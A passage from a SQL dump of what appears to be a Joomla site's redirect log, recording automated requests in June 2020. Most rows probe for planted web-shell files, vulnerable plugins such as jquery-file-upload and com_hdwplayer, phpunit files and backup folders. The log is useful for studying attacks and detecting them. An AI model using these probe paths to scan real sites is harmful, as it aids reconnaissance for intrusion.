00:00:00',301),(24985,'http://3s-technologies.com.tr/tr/media/media.php',NULL,'http://site.ru','',3,0,'2020-06-21 06:06:20','0000-00-00 00:00:00',301),(24986,'http://3s-technologies.com.tr/tr/.well-known/.secret.php',NULL,'http://site.ru','',2,0,'2020-06-21 06:31:43','0000-00-00 00:00:00',301),(24987,'http://3s-technologies.com.tr/tr/administrator/components/com_imageshow/language/site/de-de/htaccess.php',NULL,'http://site.ru','',1,0,'2020-06-21 07:00:24','0000-00-00 00:00:00',301),(24988,'http://3s-technologies.com.tr/tr/administrator/components/com_imageshow/language/site/it-it/htaccess.php',NULL,'http://site.ru','',2,0,'2020-06-21 07:51:38','0000-00-00 00:00:00',301),(24989,'http://3s-technologies.com.tr/tr/libraries/joomla/template/rice.php',NULL,'http://site.ru','',2,0,'2020-06-21 07:52:58','0000-00-00 00:00:00',301),(24990,'http://3s-technologies.com.tr/tr/administrator/components/com_mapyandex/views/mapyandexajaxtask/tmpl/htaccess.php',NULL,'http://site.ru','',5,0,'2020-06-21 08:19:21','0000-00-00 00:00:00',301),(24991,'http://3s-technologies.com.tr/tr/web/assets/plugins/jquery-file-upload/server/php/index.php',NULL,'http://www.google.com/','',2,0,'2020-06-21 08:26:24','0000-00-00 00:00:00',301),(24992,'http://3s-technologies.com.tr/tr/web/assets/jquery-file-upload/server/php/index.php',NULL,'http://www.google.com/','',2,0,'2020-06-21 08:26:25','0000-00-00 00:00:00',301),(24993,'http://3s-technologies.com.tr/tr/web/assets/global/plugins/jquery-file-upload/server/php/index.php',NULL,'http://www.google.com/','',2,0,'2020-06-21 08:26:25','0000-00-00 00:00:00',301),(24994,'http://3s-technologies.com.tr/bitrix/admin/search.php',NULL,'','',2,0,'2020-06-21 08:40:57','0000-00-00 00:00:00',301),(24995,'http://3s-technologies.com.tr/tr/administrator/components/com_imageshow/language/site/ru-ru/htaccess.php',NULL,'http://site.ru','',1,0,'2020-06-21 08:46:19','0000-00-00 00:00:00',301),(24996,'http://3s-technologies.com.tr/tr/olad.php.suspected',NULL,'http://site.ru','',4,0,'2020-06-21 09:41:19','0000-00-00 00:00:00',301),(24997,'http://3s-technologies.com.tr/tr/cache/newsleter.php.suspected',NULL,'http://site.ru','',15,0,'2020-06-21 09:41:29','0000-00-00 00:00:00',301),(24998,'http://3s-technologies.com.tr/tr/administrator/components/com_imageshow/sql/updates/sqlsrv/htaccess.php',NULL,'http://site.ru','',3,0,'2020-06-21 10:06:55','0000-00-00 00:00:00',301),(24999,'http://3s-technologies.com.tr/tr/doc.php.suspected',NULL,'http://site.ru','',6,0,'2020-06-21 10:58:04','0000-00-00 00:00:00',301),(25000,'http://3s-technologies.com.tr/tr/google-site-verification-content-fpk8ez12pdbewljjo9xhbxlv7lhxa9nplpcode87.php',NULL,'http://site.ru','',3,0,'2020-06-21 11:23:36','0000-00-00 00:00:00',301),(25001,'http://3s-technologies.com.tr/tr/libraries/joomla/template/mark.php.suspected',NULL,'http://site.ru','',5,0,'2020-06-21 11:23:37','0000-00-00 00:00:00',301),(25002,'http://3s-technologies.com.tr/tr/wp-img.php',NULL,'http://site.ru','',5,0,'2020-06-21 11:48:38','0000-00-00 00:00:00',301),(25003,'http://3s-technologies.com.tr/tr/sitemps.php',NULL,'http://site.ru','',4,0,'2020-06-21 12:14:51','0000-00-00 00:00:00',301),(25004,'http://3s-technologies.com.tr/tr/wp-m.php',NULL,'http://site.ru','',6,0,'2020-06-21 12:40:28','0000-00-00 00:00:00',301),(25005,'http://3s-technologies.com.tr/tr/cache/doc.php.suspected',NULL,'http://site.ru','',4,0,'2020-06-21 13:30:59','0000-00-00 00:00:00',301),(25006,'http://3s-technologies.com.tr/tr/gank.php.php.suspected',NULL,'http://site.ru','',5,0,'2020-06-21 13:33:33','0000-00-00 00:00:00',301),(25007,'http://3s-technologies.com.tr/tr/libraries/joomla/utilities/iterator.php',NULL,'http://site.ru','',3,0,'2020-06-21 13:56:39','0000-00-00 00:00:00',301),(25008,'http://3s-technologies.com.tr/tr/test.php.suspected',NULL,'http://site.ru','',4,0,'2020-06-21 13:56:45','0000-00-00 00:00:00',301),(25009,'http://3s-technologies.com.tr/tr/administrator/components/com_imageshow/language/site/ja-jp/htaccess.php',NULL,'http://site.ru','',1,0,'2020-06-21 14:21:49','0000-00-00 00:00:00',301),(25010,'http://3s-technologies.com.tr/tr/tmp/joomla.php',NULL,'http://site.ru','',3,0,'2020-06-21 14:21:49','0000-00-00 00:00:00',301),(25011,'http://3s-technologies.com.tr/tr/modules/mod_fxprev/libraries/wp-plugins.php',NULL,'http://site.ru','',3,0,'2020-06-21 14:22:59','0000-00-00 00:00:00',301),(25012,'http://3s-technologies.com.tr/tr/wp-mial.php',NULL,'http://site.ru','',3,0,'2020-06-21 14:49:25','0000-00-00 00:00:00',301),(25013,'http://3s-technologies.com.tr/tr/plugins/djmediatools/djclassifieds/language/gank.php.php',NULL,'http://site.ru','',2,0,'2020-06-21 16:00:05','0000-00-00 00:00:00',301),(25014,'http://3s-technologies.com.tr/tr/photo-album/sitemps.php',NULL,'http://site.ru','',1,0,'2020-06-21 16:00:27','0000-00-00 00:00:00',301),(25015,'http://3s-technologies.com.tr/tr/plugins/authentication/gmail/beautifu.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-21 16:00:36','0000-00-00 00:00:00',301),(25016,'http://3s-technologies.com.tr/tr/plugins/editors/codemirror/layouts/editors/codemirror/class.php',NULL,'http://site.ru','',1,0,'2020-06-21 16:01:08','0000-00-00 00:00:00',301),(25017,'http://3s-technologies.com.tr/tr/modules/mod_related_items/data.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-21 16:01:20','0000-00-00 00:00:00',301),(25018,'http://3s-technologies.com.tr/tr/modules/mod_roknavmenu/themes/default/js/wp-block.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-21 17:17:49','0000-00-00 00:00:00',301),(25019,'http://3s-technologies.com.tr/tr/mw.php',NULL,'http://site.ru','',8,0,'2020-06-21 17:17:58','0000-00-00 00:00:00',301),(25020,'http://3s-technologies.com.tr/tr/plugins/djmediatools/folder/language/simple.php5',NULL,'http://site.ru','',2,0,'2020-06-21 17:18:14','0000-00-00 00:00:00',301),(25021,'http://www.3s-technologies.com.tr/tr/js/tc.js',NULL,'','',1,0,'2020-06-21 21:28:25','0000-00-00 00:00:00',301),(25022,'http://3s-technologies.com.tr/tr/gcohjrkpxag.html',NULL,'','',1,0,'2020-06-22 06:15:56','0000-00-00 00:00:00',301),(25023,'http://3s-technologies.com.tr/tr/administrator/components/com_newsfeeds/com_newsfeeds.xml',NULL,'','',1,0,'2020-06-22 15:35:19','0000-00-00 00:00:00',301),(25024,'http://3s-technologies.com.tr/tr/administrator/components/com_hdwplayer/com_hdwplayer.xml',NULL,'','',1,0,'2020-06-22 15:35:28','0000-00-00 00:00:00',301),(25025,'http://3s-technologies.com.tr/tr/administrator/components/com_hdwplayer/hdwplayer.xml',NULL,'','',1,0,'2020-06-22 15:35:31','0000-00-00 00:00:00',301),(25026,'http://3s-technologies.com.tr/tr/administrator/components/com_hdwplayer/_hdwplayer.xml',NULL,'','',1,0,'2020-06-22 15:35:34','0000-00-00 00:00:00',301),(25027,'http://3s-technologies.com.tr/tr/administrator/components/com_hdwplayer/config.xml',NULL,'','',1,0,'2020-06-22 15:35:38','0000-00-00 00:00:00',301),(25028,'http://3s-technologies.com.tr/tr/administrator/components/com_hdwplayer/access.xml',NULL,'','',1,0,'2020-06-22 15:35:40','0000-00-00 00:00:00',301),(25029,'http://3s-technologies.com.tr/tr/administrator/components/com_acym/com_acym.xml',NULL,'','',1,0,'2020-06-22 15:35:43','0000-00-00 00:00:00',301),(25030,'http://3s-technologies.com.tr/tr/administrator/components/com_acym/acym.xml',NULL,'','',1,0,'2020-06-22 15:35:45','0000-00-00 00:00:00',301),(25031,'http://3s-technologies.com.tr/tr/administrator/components/com_acym/_acym.xml',NULL,'','',1,0,'2020-06-22 15:35:48','0000-00-00 00:00:00',301),(25032,'http://3s-technologies.com.tr/tr/administrator/components/com_acym/config.xml',NULL,'','',1,0,'2020-06-22 15:35:50','0000-00-00 00:00:00',301),(25033,'http://3s-technologies.com.tr/tr/administrator/components/com_acym/access.xml',NULL,'','',1,0,'2020-06-22 15:35:53','0000-00-00 00:00:00',301),(25034,'http://3s-technologies.com.tr/tr/administrator/components/com_gmapfp/com_gmapfp.xml',NULL,'','',1,0,'2020-06-22 15:35:57','0000-00-00 00:00:00',301),(25035,'http://3s-technologies.com.tr/tr/administrator/components/com_gmapfp/gmapfp.xml',NULL,'','',1,0,'2020-06-22 15:36:00','0000-00-00 00:00:00',301),(25036,'http://3s-technologies.com.tr/tr/administrator/components/com_gmapfp/_gmapfp.xml',NULL,'','',1,0,'2020-06-22 15:36:03','0000-00-00 00:00:00',301),(25037,'http://3s-technologies.com.tr/tr/administrator/components/com_gmapfp/config.xml',NULL,'','',1,0,'2020-06-22 15:36:03','0000-00-00 00:00:00',301),(25038,'http://3s-technologies.com.tr/tr/administrator/components/com_gmapfp/access.xml',NULL,'','',1,0,'2020-06-22 15:36:06','0000-00-00 00:00:00',301),(25039,'http://www.3s-technologies.com.tr/tr/old-wp',NULL,'http://www.3s-technologies.com.tr/old-wp/','',7,0,'2020-06-22 17:41:42','0000-00-00 00:00:00',301),(25040,'http://www.3s-technologies.com.tr/tr/old-site',NULL,'http://www.3s-technologies.com.tr/old-site/','',8,0,'2020-06-22 17:41:43','0000-00-00 00:00:00',301),(25041,'http://www.3s-technologies.com.tr/tr/bak',NULL,'http://www.3s-technologies.com.tr/bak/','',8,0,'2020-06-22 17:41:47','0000-00-00 00:00:00',301),(25042,'http://www.3s-technologies.com.tr/tr/sito',NULL,'http://www.3s-technologies.com.tr/sito/','',2,0,'2020-06-22 17:41:47','0000-00-00 00:00:00',301),(25043,'http://www.3s-technologies.com.tr/tr/2020',NULL,'http://www.3s-technologies.com.tr/2020/','',8,0,'2020-06-22 17:41:48','0000-00-00 00:00:00',301),(25044,'https://www.3s-technologies.com.tr/tr/nav',NULL,'','',8,0,'2020-06-23 04:09:11','0000-00-00 00:00:00',301),(25045,'https://www.3s-technologies.com.tr/tr/hakk',NULL,'','',8,0,'2020-06-23 04:09:11','0000-00-00 00:00:00',301),(25046,'https://www.3s-technologies.com.tr/tr/wood-processing-ah',NULL,'','',8,0,'2020-06-23 04:09:12','0000-00-00 00:00:00',301),(25047,'https://www.3s-technologies.com.tr/tr/akrilik-i',NULL,'','',8,0,'2020-06-23 04:09:12','0000-00-00 00:00:00',301),(25048,'https://www.3s-technologies.com.tr/tr/main',NULL,'','',8,0,'2020-06-23 04:09:14','0000-00-00 00:00:00',301),(25049,'https://www.3s-technologies.com.tr/tr/aluminyum-i',NULL,'','',8,0,'2020-06-23 04:09:14','0000-00-00 00:00:00',301),(25050,'https://www.3s-technologies.com.tr/tr/title',NULL,'','',2,0,'2020-06-23 04:09:15','0000-00-00 00:00:00',301),(25051,'https://www.3s-technologies.com.tr/tr/ah',NULL,'','',8,0,'2020-06-23 04:09:22','0000-00-00 00:00:00',301),(25052,'http://3s-technologies.com.tr/tr/phpunit.xml',NULL,'','',3,0,'2020-06-24 07:36:23','0000-00-00 00:00:00',301),(25053,'http://3s-technologies.com.tr/tr//vendor/phpunit/phpunit/build.xml',NULL,'','',1,0,'2020-06-25 02:56:09','0000-00-00 00:00:00',301),(25054,'http://www.3s-technologies.com.tr/tr/admin/template/images/ck_form.js',NULL,'','',1,0,'2020-06-26 21:11:18','0000-00-00 00:00:00',301),(25055,'http://3s-technologies.com.tr/tr/modules/mod_maximenuck/assets/svggradient/data.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-27 04:31:55','0000-00-00 00:00:00',301),(25056,'http://3s-technologies.com.tr/tr/modules/pp1.php',NULL,'http://site.ru','',2,0,'2020-06-27 05:06:53','0000-00-00 00:00:00',301),(25057,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/xun.php',NULL,'http://site.ru','',1,0,'2020-06-27 05:07:02','0000-00-00 00:00:00',301),(25058,'http://3s-technologies.com.tr/tr/modules/mod_jcomment/mod_jcomment.php',NULL,'http://site.ru','',2,0,'2020-06-27 05:07:09','0000-00-00 00:00:00',301),(25059,'http://3s-technologies.com.tr/tr/nrw4vc.php',NULL,'http://site.ru','',2,0,'2020-06-27 05:07:12','0000-00-00 00:00:00',301),(25060,'http://3s-technologies.com.tr/tr/modules/mod_maximenuck/themes/default/images/data.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-27 05:07:14','0000-00-00 00:00:00',301),(25061,'http://3s-technologies.com.tr/tr/modules/mod_fxprev/libraries/simple.php5',NULL,'http://site.ru','',3,0,'2020-06-27 05:41:07','0000-00-00 00:00:00',301),(25062,'http://3s-technologies.com.tr/tr/modules/mod_tags_popular/data.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-27 06:10:56','0000-00-00 00:00:00',301),(25063,'http://3s-technologies.com.tr/tr/modules/mod_login/w.php',NULL,'http://site.ru','',3,0,'2020-06-27 06:11:17','0000-00-00 00:00:00',301),(25064,'http://3s-technologies.com.tr/tr/paypal/content-post.php',NULL,'http://site.ru','',1,0,'2020-06-27 06:15:13','0000-00-00 00:00:00',301),(25065,'http://3s-technologies.com.tr/tr/modules/mod_languages/tmpl/data.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-27 06:43:17','0000-00-00 00:00:00',301),(25066,'http://3s-technologies.com.tr/tr/modules/mod_maximenuck/themes/tabs/data.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-27 06:44:21','0000-00-00 00:00:00',301),(25067,'http://3s-technologies.com.tr/tr/pages/ex_liner.php',NULL,'http://site.ru','',1,0,'2020-06-27 07:15:13','0000-00-00 00:00:00',301),(25068,'http://3s-technologies.com.tr/tr/language/es-es/ob.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-27 07:15:48','0000-00-00 00:00:00',301),(25069,'http://3s-technologies.com.tr/tr/mrspy.php',NULL,'http://site.ru','',2,0,'2020-06-27 07:46:55','0000-00-00 00:00:00',301),(25070,'http://3s-technologies.com.tr/tr/layouts/404.php',NULL,'http://site.ru','',1,0,'2020-06-27 08:18:44','0000-00-00 00:00:00',301),(25071,'http://3s-technologies.com.tr/tr/paypal/wp-cofigs.php',NULL,'http://site.ru','',1,0,'2020-06-27 08:18:58','0000-00-00 00:00:00',301),(25072,'http://3s-technologies.com.tr/tr/plugins/editors/codemirror/layouts/editors/codemirror/theme.php',NULL,'http://site.ru','',2,0,'2020-06-27 08:19:07','0000-00-00 00:00:00',301),(25073,'http://3s-technologies.com.tr/tr/modules/modules.php',NULL,'http://site.ru','',1,0,'2020-06-27 08:51:03','0000-00-00 00:00:00',301),(25074,'http://3s-technologies.com.tr/tr/language/es-es/ex_liner.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-27 08:51:26','0000-00-00 00:00:00',301),(25075,'http://3s-technologies.com.tr/tr/modules/mod_latestdiscussion/tmpl/ix.php.php',NULL,'http://site.ru','',1,0,'2020-06-27 09:23:10','0000-00-00 00:00:00',301),(25076,'http://3s-technologies.com.tr/tr/parseopml/wp-cofigs.php',NULL,'http://site.ru','',3,0,'2020-06-27 09:23:16','0000-00-00 00:00:00',301),(25077,'http://3s-technologies.com.tr/tr/modules/mod_roknavmenu/themes/default/index.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-27 09:55:18','0000-00-00 00:00:00',301),(25078,'http://3s-technologies.com.tr/tr/modules/mod_maximenuck/themes/default/css/data.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-27 09:56:23','0000-00-00 00:00:00',301),(25079,'http://3s-technologies.com.tr/tr/plugins/content/widgetkit/streamed.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-27 10:27:22','0000-00-00 00:00:00',301),(25080,'http://3s-technologies.com.tr/tr/plugins/content/widgetkit/streamed.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-27 10:27:22','0000-00-00 00:00:00',301),(25081,'http://3s-technologies.com.tr/tr/oude/wp-content/themes/jasmijnbul/single-help.php',NULL,'http://site.ru','',1,0,'2020-06-27 10:27:33','0000-00-00 00:00:00',301),(25082,'http://3s-technologies.com.tr/tr/modules/mod_bt_simple_slideshow/tmpl/images/data.php',NULL,'http://site.ru','',1,0,'2020-06-27 10:28:29','0000-00-00 00:00:00',301),(25083,'http://3s-technologies.com.tr/tr/old/wp-muen.php',NULL,'http://site.ru','',1,0,'2020-06-27 13:09:49','0000-00-00 00:00:00',301),(25084,'http://3s-technologies.com.tr/tr/libraries/cms/schema/changeitem/data.php',NULL,'http://site.ru','',1,0,'2020-06-27 13:10:04','0000-00-00 00:00:00',301),(25085,'http://3s-technologies.com.tr/tr/libraries/phpmailer/language/popup-pomo.php',NULL,'http://site.ru','',2,0,'2020-06-27 13:10:06','0000-00-00 00:00:00',301),(25086,'http://3s-technologies.com.tr/tr/libraries/pear/archive_tar/index2.php',NULL,'http://site.ru','',1,0,'2020-06-27 13:10:37','0000-00-00 00:00:00',301),(25087,'http://3s-technologies.com.tr/tr/media/editors/tinymce/skins/lightgray/fonts/xixi.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-27 13:42:57','0000-00-00 00:00:00',301),(25088,'http://3s-technologies.com.tr/tr/wp-snapshots/wp-caches.php',NULL,'http://site.ru','',1,0,'2020-06-27 13:43:02','0000-00-00 00:00:00',301),(25089,'http://3s-technologies.com.tr/tr/templates/protostar/css/gank.php.php',NULL,'http://site.ru','',2,0,'2020-06-27 13:43:14','0000-00-00 00:00:00',301),(25090,'http://3s-technologies.com.tr/tr/libraries/simpleside.php5.suspected',NULL,'http://site.ru','',1,0,'2020-06-27 13:43:14','0000-00-00 00:00:00',301),(25091,'http://3s-technologies.com.tr/tr/plugins/editors/tinymce/jscripts/tiny_mce/plugins/example/js/simpleside.php5',NULL,'http://site.ru','',1,0,'2020-06-27 13:43:14','0000-00-00 00:00:00',301),(25092,'http://3s-technologies.com.tr/tr/libraries/joomla/html/parameter/element/.readme.php',NULL,'http://site.ru','',2,0,'2020-06-27 13:43:18','0000-00-00 00:00:00',301),(25093,'http://3s-technologies.com.tr/tr/media/system/wp.php',NULL,'http://site.ru','',2,0,'2020-06-27 13:43:21','0000-00-00 00:00:00',301),(25094,'http://3s-technologies.com.tr/tr/os.php',NULL,'http://site.ru','',3,0,'2020-06-27 13:43:22','0000-00-00 00:00:00',301),(25095,'http://3s-technologies.com.tr/tr/tmp/sllolx.php',NULL,'http://site.ru','',1,0,'2020-06-27 14:15:23','0000-00-00 00:00:00',301),(25096,'http://3s-technologies.com.tr/tr/layouts/index4.php',NULL,'http://site.ru','',2,0,'2020-06-27 14:15:35','0000-00-00 00:00:00',301),(25097,'http://3s-technologies.com.tr/tr/jquery-validation/combo.php',NULL,'http://site.ru','',1,0,'2020-06-27 14:16:59','0000-00-00 00:00:00',301),(25098,'http://3s-technologies.com.tr/tr/libraries/fof/model/behavior/.h..php',NULL,'http://site.ru','',2,0,'2020-06-27 14:48:57','0000-00-00 00:00:00',301),(25099,'http://3s-technologies.com.tr/tr/js/js/data.php',NULL,'http://site.ru','',1,0,'2020-06-27 14:49:51','0000-00-00 00:00:00',301),(25100,'http://3s-technologies.com.tr/tr/templates/beez5/index.php.backup',NULL,'http://site.ru','',1,0,'2020-06-27 15:21:18','0000-00-00 00:00:00',301),(25101,'http://3s-technologies.com.tr/tr/libraries/joomla/template/module/modifier/hell.php',NULL,'http://site.ru','',1,0,'2020-06-27 15:21:26','0000-00-00 00:00:00',301),(25102,'http://3s-technologies.com.tr/tr/kopia/en/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/folders.php',NULL,'http://site.ru','',2,0,'2020-06-27 15:21:59','0000-00-00 00:00:00',301),(25103,'http://3s-technologies.com.tr/tr/libraries/phpmailer/language/mark.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-27 15:53:10','0000-00-00 00:00:00',301),(25104,'http://3s-technologies.com.tr/tr/media/media/images/white.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-27 15:53:11','0000-00-00 00:00:00',301),(25105,'http://3s-technologies.com.tr/tr/libraries/legacy/error/content-post.php',NULL,'http://site.ru','',1,0,'2020-06-27 15:53:16','0000-00-00 00:00:00',301),(25106,'http://3s-technologies.com.tr/tr/libraries/joomla/base/wp-seca.php',NULL,'http://site.ru','',2,0,'2020-06-27 15:53:19','0000-00-00 00:00:00',301),(25107,'http://3s-technologies.com.tr/tr/libraries/openid/auth/feal.php',NULL,'http://site.ru','',2,0,'2020-06-27 15:53:44','0000-00-00 00:00:00',301),(25108,'http://3s-technologies.com.tr/tr/libraries/simplepie/hoz.php',NULL,'http://site.ru','',1,0,'2020-06-27 16:22:14','0000-00-00 00:00:00',301),(25109,'http://3s-technologies.com.tr/tr/lkunge.php',NULL,'http://site.ru','',3,0,'2020-06-27 16:22:39','0000-00-00 00:00:00',301),(25110,'http://3s-technologies.com.tr/tr/media/system/images/moorainbow/gank.php.php',NULL,'http://site.ru','',1,0,'2020-06-27 16:23:08','0000-00-00 00:00:00',301),(25111,'http://3s-technologies.com.tr/tr/myshop.kinasportswear.com/wp-catcha.php',NULL,'http://site.ru','',1,0,'2020-06-27 16:23:33','0000-00-00 00:00:00',301),(25112,'http://3s-technologies.com.tr/tr/libraries/phpmailer/language/content-post.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-27 16:54:38','0000-00-00 00:00:00',301),(25113,'http://3s-technologies.com.tr/tr/ollx.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-27 16:54:54','0000-00-00 00:00:00',301),(25114,'http://3s-technologies.com.tr/tr/libraries/phpmailer/language/feal.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-27 17:26:12','0000-00-00 00:00:00',301),(25115,'http://3s-technologies.com.tr/tr/libraries/fof/integration/joomla/filesystem/data.php',NULL,'http://site.ru','',1,0,'2020-06-27 17:26:12','0000-00-00 00:00:00',301),(25116,'http://3s-technologies.com.tr/tr/lpeziy.php',NULL,'http://site.ru','',1,0,'2020-06-27 17:26:13','0000-00-00 00:00:00',301),(25117,'http://3s-technologies.com.tr/tr/templates/beez3/o.php',NULL,'http://site.ru','',3,0,'2020-06-27 17:27:03','0000-00-00 00:00:00',301),(25118,'http://3s-technologies.com.tr/tr/libraries/joomla/html/parameter/element/thumb.php',NULL,'http://site.ru','',1,0,'2020-06-27 17:58:25','0000-00-00 00:00:00',301),(25119,'http://3s-technologies.com.tr/tr/templates/beez3/html/layouts/joomla/system/wp-img.php',NULL,'http://site.ru','',1,0,'2020-06-27 17:58:41','0000-00-00 00:00:00',301),(25120,'http://3s-technologies.com.tr/tr/media/editors/tinymce/plugins/paste/settings.php',NULL,'http://site.ru','',1,0,'2020-06-27 17:58:46','0000-00-00 00:00:00',301),(25121,'http://3s-technologies.com.tr/tr/includes/search.class.php',NULL,'http://site.ru','',1,0,'2020-06-27 17:58:52','0000-00-00 00:00:00',301),(25122,'http://3s-technologies.com.tr/tr/libraries/joomla/github/package/issues/data.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-27 18:01:37','0000-00-00 00:00:00',301),(25123,'http://3s-technologies.com.tr/tr/plugins/finder/categories/ob.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-27 18:29:32','0000-00-00 00:00:00',301),(25124,'http://3s-technologies.com.tr/tr/xfx1ot.php',NULL,'http://site.ru','',2,0,'2020-06-27 18:30:32','0000-00-00 00:00:00',301),(25125,'http://3s-technologies.com.tr/tr/templates/beez_20/content-post.php',NULL,'http://site.ru','',1,0,'2020-06-27 19:12:47','0000-00-00 00:00:00',301),(25126,'http://3s-technologies.com.tr/tr/tmp/install_4ffcb135841c9/hu-hu/apps/blog/language/wp-block.php',NULL,'http://site.ru','',3,0,'2020-06-27 19:13:34','0000-00-00 00:00:00',301),(25127,'http://3s-technologies.com.tr/tr/libraries/legacy/error/xmlsrpc.php',NULL,'http://site.ru','',1,0,'2020-06-27 19:13:34','0000-00-00 00:00:00',301),(25128,'http://3s-technologies.com.tr/tr/libraries/phpmailer/index.htmly.php',NULL,'http://site.ru','',1,0,'2020-06-27 19:13:55','0000-00-00 00:00:00',301),(25129,'http://3s-technologies.com.tr/tr/xnx.php',NULL,'http://site.ru','',1,0,'2020-06-27 19:44:44','0000-00-00 00:00:00',301),(25130,'http://3s-technologies.com.tr/tr/testspan.kinasportswear.com/wp-catcha.php',NULL,'http://site.ru','',4,0,'2020-06-27 19:45:09','0000-00-00 00:00:00',301),(25131,'http://3s-technologies.com.tr/tr/templates/beez5/html/html5.php',NULL,'http://site.ru','',1,0,'2020-06-27 19:45:09','0000-00-00 00:00:00',301),(25132,'http://3s-technologies.com.tr/tr/lyonc.php',NULL,'http://site.ru','',5,0,'2020-06-27 19:45:12','0000-00-00 00:00:00',301),(25133,'http://3s-technologies.com.tr/tr/includes/freedoms.php',NULL,'http://site.ru','',1,0,'2020-06-27 19:45:29','0000-00-00 00:00:00',301),(25134,'http://3s-technologies.com.tr/tr/modules/languages.php',NULL,'http://site.ru','',1,0,'2020-06-27 21:12:45','0000-00-00 00:00:00',301),(25135,'http://3s-technologies.com.tr/tr/modules/languages.php',NULL,'http://site.ru','',1,0,'2020-06-27 21:12:45','0000-00-00 00:00:00',301),(25136,'http://3s-technologies.com.tr/tr/old/simple.php5',NULL,'http://site.ru','',2,0,'2020-06-27 21:12:45','0000-00-00 00:00:00',301),(25137,'http://3s-technologies.com.tr/tr/log/content-post.php',NULL,'http://site.ru','',2,0,'2020-06-27 21:12:52','0000-00-00 00:00:00',301),(25138,'http://3s-technologies.com.tr/tr/media/media/simpleside.php5',NULL,'http://site.ru','',1,0,'2020-06-27 21:16:21','0000-00-00 00:00:00',301),(25139,'http://3s-technologies.com.tr/tr/libraries/fof/utils/installscript/content-post.php',NULL,'http://site.ru','',1,0,'2020-06-27 21:41:01','0000-00-00 00:00:00',301),(25140,'http://3s-technologies.com.tr/tr/media/com_contenthistory/js/data.php',NULL,'http://site.ru','',1,0,'2020-06-27 21:41:05','0000-00-00 00:00:00',301),(25141,'http://3s-technologies.com.tr/tr/libraries/joomla/template/k.php',NULL,'http://site.ru','',1,0,'2020-06-27 21:41:15','0000-00-00 00:00:00',301),(25142,'http://3s-technologies.com.tr/tr/media/wp-type.php',NULL,'http://site.ru','',1,0,'2020-06-27 21:41:24','0000-00-00 00:00:00',301),(25143,'http://3s-technologies.com.tr/tr/media/editors/codemirror/mode/vhdl/admin-class.php',NULL,'http://site.ru','',1,0,'2020-06-27 21:41:50','0000-00-00 00:00:00',301),(25144,'http://3s-technologies.com.tr/tr/templates/beez3/html/mod_login/gank.php.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-27 21:42:38','0000-00-00 00:00:00',301),(25145,'http://3s-technologies.com.tr/tr/templates/protostar/doc.php',NULL,'http://site.ru','',1,0,'2020-06-27 22:10:12','0000-00-00 00:00:00',301),(25146,'http://3s-technologies.com.tr/tr/libraries/openid/auth/hell.php',NULL,'http://site.ru','',1,0,'2020-06-27 22:10:26','0000-00-00 00:00:00',301),(25147,'http://3s-technologies.com.tr/tr/images/neymar.gif',NULL,'','',2,0,'2020-06-27 22:34:37','0000-00-00 00:00:00',301),(25148,'http://3s-technologies.com.tr/tr/libraries/legacy/simplecrypt/gank.php.php',NULL,'http://site.ru','',1,0,'2020-06-27 22:37:30','0000-00-00 00:00:00',301),(25149,'http://3s-technologies.com.tr/tr/plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/.h..php',NULL,'http://site.ru','',2,0,'2020-06-27 22:37:50','0000-00-00 00:00:00',301),(25150,'http://3s-technologies.com.tr/tr/libraries/0p0b8xpt.php',NULL,'http://site.ru','',2,0,'2020-06-27 22:37:55','0000-00-00 00:00:00',301),(25151,'http://3s-technologies.com.tr/tr/modules/mod_articles_latest/tmpl/feal.php',NULL,'http://site.ru','',1,0,'2020-06-27 22:38:17','0000-00-00 00:00:00',301),(25152,'http://3s-technologies.com.tr/tr/nsgin.com/cache/simple.php5',NULL,'http://site.ru','',2,0,'2020-06-27 23:06:15','0000-00-00 00:00:00',301),(25153,'http://3s-technologies.com.tr/tr/layouts/joomla/content/icons/simpleside.php5',NULL,'http://site.ru','',2,0,'2020-06-27 23:33:57','0000-00-00 00:00:00',301),(25154,'http://3s-technologies.com.tr/tr/libraries/fof/utils/installscript/wp-side.php',NULL,'http://site.ru','',1,0,'2020-06-27 23:34:00','0000-00-00 00:00:00',301),(25155,'http://3s-technologies.com.tr/tr/plugins/editors/tinymce/jscripts/tiny_mce/plugins/directionality/feter.php',NULL,'http://site.ru','',1,0,'2020-06-27 23:34:25','0000-00-00 00:00:00',301),(25156,'http://3s-technologies.com.tr/tr/includes/tp4hh42p.php',NULL,'http://site.ru','',1,0,'2020-06-27 23:34:47','0000-00-00 00:00:00',301),(25157,'http://3s-technologies.com.tr/tr/libraries/openid/auth/feter.php',NULL,'http://site.ru','',1,0,'2020-06-28 00:02:02','0000-00-00 00:00:00',301),(25158,'http://3s-technologies.com.tr/tr/logs/a99.php',NULL,'http://site.ru','',1,0,'2020-06-28 00:02:07','0000-00-00 00:00:00',301),(25159,'http://3s-technologies.com.tr/tr/kdbzap.php',NULL,'http://site.ru','',1,0,'2020-06-28 00:02:14','0000-00-00 00:00:00',301),(25160,'http://3s-technologies.com.tr/tr/templates/protostar/js/.h..php',NULL,'http://site.ru','',1,0,'2020-06-28 00:12:03','0000-00-00 00:00:00',301),(25161,'http://3s-technologies.com.tr/tr/libraries/phputf8/utils/wp-side.php',NULL,'http://site.ru','',1,0,'2020-06-28 00:30:07','0000-00-00 